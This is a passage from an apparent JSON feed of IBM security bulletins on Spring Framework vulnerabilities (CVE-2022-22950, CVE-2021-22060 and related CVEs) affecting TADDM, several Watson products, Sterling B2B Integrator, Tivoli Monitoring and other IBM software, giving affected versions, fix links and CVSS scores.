efix.\n 2. If there are existing efixes on TADDM (ls -rlt etc/efix*), please contact IBM Support and open a case for a custom version of the eFix as the efix involves TADDM code changes. Include the current eFix level (ls -rlt etc/efix*), TADDM version and a link to this bulletin in the Support Case\n\n**For any other TADDM fixpack level** (i.e., 7.3.0.8 or older), to apply this bulletin, upgrade to TADDM 7.3.0.9 and then follow procedure as mentioned above for TADDM 7.3.0.9 .\n\n**Table-1**\n\nFix| \n\n**VRMF **\n\n| **APAR**| **How to acquire fix** \n---|---|---|--- \nefix_spring5.3.19_FP9211123.zip| \n\n7.3.0.9\n\n| None| [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=rmQy2k9MO4TQDYzI8KFdP32meDJ1UjEnPbvvT69QdHs> \"Download eFix\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T18:17:57", "type": "ibm", "title": "Security Bulletin: A vulnerability in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (CVE-2022-22950, CVE-2021-22096, CVE-2022-22968, CVE-2021-22060).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096", "CVE-2022-22950", "CVE-2022-22968"], "modified": "2022-05-12T18:17:57", "id": "537163AF6A43E9635AC6244334A6987334AAAED355BDEC033C662E7748C0C124", "href": "https://www.ibm.com/support/pages/node/6585760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-05-27T17:52:19", "description": "## Summary\n\nSpring Framework is used IBM Watson Machine Learning Accelerator. This bulletin provides mitigations for the addressable vulnerability (CVE-2021-22060) by upgrading addressable to latest version.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Machine Learning Accelerator| 2.2.0;2.2.1;2.2.2; 2.3.0;2.3.1;2.3.2;2.3.3;2.3.4;2.3.5 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nIBM Watson Machine Learning Accelerator| 2.2.0;2.2.1;2.2.2| To address the vulnerability upgrade to IBM Watson Machine Learning Accelerator 2.2.3: <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=accelerator-upgrading-watson-machine-learning> \n \n \nIBM Watson Machine Learning Accelerator| 2.3.0; 2.3.1; 2.3.2; 2.3.3; 2.3.4; 2.3.5| To address the vulnerability upgrade to IBM Watson Machine Learning Accelerator 2.3.6: <https://www.ibm.com/docs/en/wmla/2.3?topic=installation-install-upgrade> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-03-23T02:33:36", "type": "ibm", "title": "Security Bulletin: Vulnerability in [All] Spring Framework - CVE-2021-22060 (Publicly disclosed vulnerability) impacts IBM Watson Machine Learning Accelerator", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060"], "modified": "2022-03-23T02:33:36", "id": "9881226D0C430B3D1A6167EC18E2DA00B1048D439BAB0713E00099F02830547C", "href": "https://www.ibm.com/support/pages/node/6565643", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-05-27T17:52:13", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Spring.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.6 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.7 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-9\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-03-30T15:21:20", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Spring", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060"], "modified": "2022-03-30T15:21:20", "id": "98E790BB04C04429A117CD716BBD2F338208EDD76B0775A28921DFAD56715A85", "href": "https://www.ibm.com/support/pages/node/6564601", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-05-27T17:44:34", "description": "## Summary\n\nIBM Sterilng B2B Integrator has addressed a security vulnerability in Spring Framework.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6 \nIBM Sterling B2B Integrator| \n\n6.1.0.0 - 6.1.0.5\n\n6.1.1.0 - 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product \n**| **Version**| **APAR**| **Remediation &amp; Fix** \n---|---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6| IT41291| Apply 6.0.3.7, 6.1.0.6, 6.1.1.2 or 6.1.2.0 \nIBM Sterling B2B Integrator| \n\n6.1.0.0 - 6.1.0.5\n\n6.1.1.0 - 6.1.1.1\n\n| IT41291| Apply 6.1.0.6, 6.1.1.2 or 6.1.2.0 \n \nThe version 6.0.3.7, 6.1.0.6 and 6.1.1.2 are available on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>). The IIM version of 6.1.2.0 is available in IBM Passport Advantage. The container version of 6.1.2.0 is available in IBM Entitled Registry with following tags. \n\ncp.icr.io/cp/ibm-b2bi/b2bi:6.1.2.0 for IBM Sterling B2B Integrator \ncp.icr.io/cp/ibm-sfg/sfg:6.1.2.0 for IBM Sterling File Gateway\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-10-17T12:56:54", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator vulnerable to security bypass due to Spring Framework (CVE-2021-22060)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060"], "modified": "2022-10-17T12:56:54", "id": "6C0C64141920EE55899BAEC8A62C876633A02F40707156E9F4782FB71BDA3A8D", "href": "https://www.ibm.com/support/pages/node/6829861", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-06-24T06:05:09", "description": "## Summary\n\nIBM Planning Analytics Workspace is affected by multiple vulnerabilites. Spring is used in IBM Planning Analytics Workspace in Server Side Rest APIs as an indirect dependency by MongoDB that is used to store content (CVE-2022-22950). FasterXML jackson-databind is used in IBM Planning Analytics Workspace to parse and generate json files (XFID: 217968). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** IBM X-Force ID: **217968 \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by an error when using JDK serialization to serialize and deserialize JsonNode values. By sending a specially crafted request, an attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/217968 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217968>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security updates:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central ](<https://www.ibm.com/support/pages/node/6584994> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central\" ) \n \n\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0 on premise offerings. The vulnerabilities listed above have been addressed on IBM Planning Analytics with Watson and no further action is required.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-13T17:08:13", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics Workspace is affected by multiple vulnerabilities (CVE-2022-22950, XFID:217968)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-13T17:08:13", "id": "933F16C198EDF616BD60B2C55B4AE9B642F3BD83CA146DEBB0E52EC9050248AF", "href": "https://www.ibm.com/support/pages/node/6579613", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T05:50:13", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation in VMware Tanzu Spring Framework (CVE-2022-22950). This appears in the Java code used by some of our service components. Please read the details for remediation below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.8 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data**| **4.0.9**| **The fix in 4.0.9 applies to all versions listed (4.0.0-4.0.8). Version 4.0.9 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation with Spring Framework (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-01-12T21:59:00", "id": "A97F6751F71164D0A07AD868814BD46D147EF591C7234360EA8F62B2317AA675", "href": "https://www.ibm.com/support/pages/node/6593865", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T05:51:05", "description": "## Summary\n\nIBM Tivoli Monitoring is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22950). The Tivoli Enterprise Portal Server (CQ) component includes but does not use it. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 - 6.3.0.7 (up to 6.3.0.7 Service pack 10) \n \n\n\n## Remediation/Fixes\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0012| 6.3.0.7 Fix Pack 7 Service Pack 12| <https://www.ibm.com/support/pages/ibm-tivoli-monitoring-630-fix-pack-7-service-pack-12-6307-tiv-itm-sp0012> \nThe fix requires the system is at 630 Fix pack 7 or later as a prerequisite. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring is affected but not classified as vulnerable by a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-12-30T17:31:59", "id": "471BEEF44DE6C27461378C7D110744F38E295FB10C4A50D100750E5E0D7941A0", "href": "https://www.ibm.com/support/pages/node/6579161", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-14T17:35:49", "description": "## Summary\n\nIn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. This effects ITNCM version 6.4.2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNCM| 6.4.2 \n \n\n\n## Remediation/Fixes\n\nThis issue has been fixed in ITNCM Fix Pack 18 and which is available in the following location in fix central. \n\nAIX, Linux, Linux zSeries : [6.4.2-TIV-ITNCM-FP018 ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FTivoli+Netcool+Configuration+Manager&fixids=6.4.2-TIV-ITNCM-FP018&source=SAR&function=fixId&parent=ibm/Tivoli> \"\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-06-06T04:57:17", "type": "ibm", "title": "Security Bulletin: [All] Spring Framework - CVE-2022-22950 (Publicly disclosed vulnerability)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-06-06T04:57:17", "id": "6C544B97B62B9464D51C78F9B268DAFEF4ADE09A38B1D9BEF0D8564D5CC42D88", "href": "https://www.ibm.com/support/pages/node/7001553", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T05:50:01", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation in VMware Tanzu Spring Framework (CVE-2022-22950). Spring Framework is used in Watson Speech Services to build our STT and TTS java services Please read the details for remediation below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.8 \n \n\n\n## Remediation/Fixes\n\n \n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data**| **4.0.9**| **The fix in 4.0.9 applies to all versions listed (4.0.0-4.0.8). Version 4.0.9 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to improper input validation in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-01-12T21:59:00", "id": "8D1FFB0AFC90D6F732CB992E0BDEB82F435593D96A68A03F6DD265E83892C473", "href": "https://www.ibm.com/support/pages/node/6591499", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T06:05:29", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a denial of service in Spring Framework (CVE-2022-22950) Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-06T23:10:16", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable to a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 